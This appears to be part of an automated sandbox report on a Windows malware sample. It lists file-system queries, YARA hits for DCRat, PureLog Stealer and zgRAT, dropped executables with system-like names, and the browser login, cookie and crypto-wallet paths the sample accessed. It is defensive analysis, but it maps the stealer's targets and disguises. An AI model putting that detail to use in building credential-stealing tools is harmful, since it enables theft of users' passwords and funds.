Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Queries volume information: C:\Recovery\DtJTopEKFGnyRQt.exe VolumeInformation
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Queries volume information: C:\Recovery\DtJTopEKFGnyRQt.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Queries volume information: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007CDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_007CDF1E

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007BB146 GetVersionExW,

0_2_007BB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000020.00000002.3386767298.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3386767298.00000000038CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2234665352.00000000125F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chainportruntimeCrtMonitor.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DtJTopEKFGnyRQt.exe PID: 8188, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.3.file.exe.50786fe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.chainportruntimeCrtMonitor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2031269682.0000000004F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2031885965.000000000502A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2150784593.00000000000C2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\DtJTopEKFGnyRQt.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.3.file.exe.50786fe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.chainportruntimeCrtMonitor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\DtJTopEKFGnyRQt.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: chainportruntimeCrtMonitor.exe, 00000005.00000002.2217563085.0000000002629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: chainportruntimeCrtMonitor.exe, 00000005.00000002.2217563085.0000000002629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000003.2031269682.0000000004F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000020.00000002.3386767298.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3386767298.00000000038CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2234665352.00000000125F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chainportruntimeCrtMonitor.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DtJTopEKFGnyRQt.exe PID: 8188, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.3.file.exe.50786fe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.chainportruntimeCrtMonitor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2031269682.0000000004F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2031885965.000000000502A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2150784593.00000000000C2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\DtJTopEKFGnyRQt.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.3.file.exe.50786fe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.chainportruntimeCrtMonitor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4f646fe.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\DtJTopEKFGnyRQt.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\sppsvc.exe, type: DROPPED
Source: Yara match	File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED

Mitre Att&ck Matrix

